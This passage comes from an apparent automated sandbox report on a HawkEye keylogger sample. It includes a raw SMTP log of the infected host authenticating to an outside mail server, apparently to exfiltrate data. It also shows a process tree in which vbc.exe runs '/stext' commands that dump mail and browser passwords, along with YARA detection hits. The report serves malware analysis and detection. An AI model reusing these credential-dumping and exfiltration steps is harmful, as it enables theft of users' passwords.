                                                                      Nov 18, 2020 15:02:25.858115911 CET58749750166.62.27.57192.168.2.4235 Authentication succeeded
                                                                      Nov 18, 2020 15:02:25.858395100 CET49750587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.139451027 CET58749750166.62.27.57192.168.2.4250 OK
                                                                      Nov 18, 2020 15:02:26.139874935 CET49750587192.168.2.4166.62.27.57RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:02:26.422636032 CET58749750166.62.27.57192.168.2.4250 Accepted
                                                                      Nov 18, 2020 15:02:26.422939062 CET49750587192.168.2.4166.62.27.57DATA
                                                                      Nov 18, 2020 15:02:26.703959942 CET58749750166.62.27.57192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:02:26.705427885 CET49750587192.168.2.4166.62.27.57.
                                                                      Nov 18, 2020 15:02:27.002060890 CET58749750166.62.27.57192.168.2.4250 OK id=1kfO2U-008ZMO-Gu
                                                                      Nov 18, 2020 15:03:06.695435047 CET58749774166.62.27.57192.168.2.4220-sg2plcpnl0157.prod.sin2.secureserver.net ESMTP Exim 4.93 #2 Wed, 18 Nov 2020 07:03:06 -0700
                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                      220 and/or bulk e-mail.
                                                                      Nov 18, 2020 15:03:06.695717096 CET49774587192.168.2.4166.62.27.57EHLO 445817
                                                                      Nov 18, 2020 15:03:06.958623886 CET58749774166.62.27.57192.168.2.4250-sg2plcpnl0157.prod.sin2.secureserver.net Hello 445817 [84.17.52.40]
                                                                      250-SIZE 52428800
                                                                      250-8BITMIME
                                                                      250-PIPELINING
                                                                      250-AUTH PLAIN LOGIN
                                                                      250-CHUNKING
                                                                      250-STARTTLS
                                                                      250-SMTPUTF8
                                                                      250 HELP
                                                                      Nov 18, 2020 15:03:06.959141970 CET49774587192.168.2.4166.62.27.57AUTH login YW5zYWZAaWlnY2VzdC5jb20=
                                                                      Nov 18, 2020 15:03:07.222193003 CET58749774166.62.27.57192.168.2.4334 UGFzc3dvcmQ6
                                                                      Nov 18, 2020 15:03:07.495678902 CET58749774166.62.27.57192.168.2.4235 Authentication succeeded
                                                                      Nov 18, 2020 15:03:07.495965004 CET49774587192.168.2.4166.62.27.57MAIL FROM:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:07.758713007 CET58749774166.62.27.57192.168.2.4250 OK
                                                                      Nov 18, 2020 15:03:07.758955002 CET49774587192.168.2.4166.62.27.57RCPT TO:<ansaf@iigcest.com>
                                                                      Nov 18, 2020 15:03:08.022917032 CET58749774166.62.27.57192.168.2.4250 Accepted
                                                                      Nov 18, 2020 15:03:08.025825977 CET49774587192.168.2.4166.62.27.57DATA
                                                                      Nov 18, 2020 15:03:08.288832903 CET58749774166.62.27.57192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                      Nov 18, 2020 15:03:08.290122032 CET49774587192.168.2.4166.62.27.57.
                                                                      Nov 18, 2020 15:03:08.570868969 CET58749774166.62.27.57192.168.2.4250 OK id=1kfO3A-008aRf-3m

                                                                      Code Manipulations

                                                                      Statistics

                                                                      CPU Usage

                                                                      Click to jump to process

                                                                      Memory Usage

                                                                      Click to jump to process

                                                                      High Level Behavior Distribution

                                                                      Click to dive into process behavior distribution

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      Analysis Process: INQUIRY.exe PID: 2016 Parent PID: 5852

                                                                      General

                                                                      Start time:15:01:48
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 5896 Parent PID: 2016

                                                                      General

                                                                      Start time:15:01:49
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe'
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 5788 Parent PID: 2016

                                                                      General

                                                                      Start time:15:01:50
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: dw20.exe PID: 6868 Parent PID: 5896

                                                                      General

                                                                      Start time:15:01:59
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2308
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 6664 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:02
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 6700 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:03
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: WerFault.exe PID: 6776 Parent PID: 5896

                                                                      General

                                                                      Start time:15:02:08
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6076 Parent PID: 5788

                                                                      General

                                                                      Start time:15:02:33
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6808 Parent PID: 6076

                                                                      General

                                                                      Start time:15:02:34
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.829490755.0000000003E11000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6792 Parent PID: 6076

                                                                      General

                                                                      Start time:15:02:35
                                                                      Start date:18/11/2020
                                                                      Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546
                                                                      Imagebase:0x400000
                                                                      File size:1009664 bytes
                                                                      MD5 hash:0B940145D7D02E5B1B975C99DD5197A4
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:Borland Delphi
                                                                      Reputation:low

                                                                      Chronological Activities

                                                                      Analysis Process: dw20.exe PID: 6936 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:39
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:dw20.exe -x -s 2272
                                                                      Imagebase:0x10000000
                                                                      File size:33936 bytes
                                                                      MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 5684 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:42
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.770041777.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: vbc.exe PID: 4184 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:43
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
                                                                      Imagebase:0x400000
                                                                      File size:1171592 bytes
                                                                      MD5 hash:C63ED21D5706A527419C9FBD730FFB2E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: WerFault.exe PID: 1076 Parent PID: 6808

                                                                      General

                                                                      Start time:15:02:45
                                                                      Start date:18/11/2020
                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324
                                                                      Imagebase:0x990000
                                                                      File size:434592 bytes
                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                      Reputation:high

                                                                      Chronological Activities

                                                                      Analysis Process: INQUIRY.exe PID: 6400 Parent PID: 6792

                                                                      General

                                                                      Start time:15:03:14
                                                                      Start date:18/11/2020
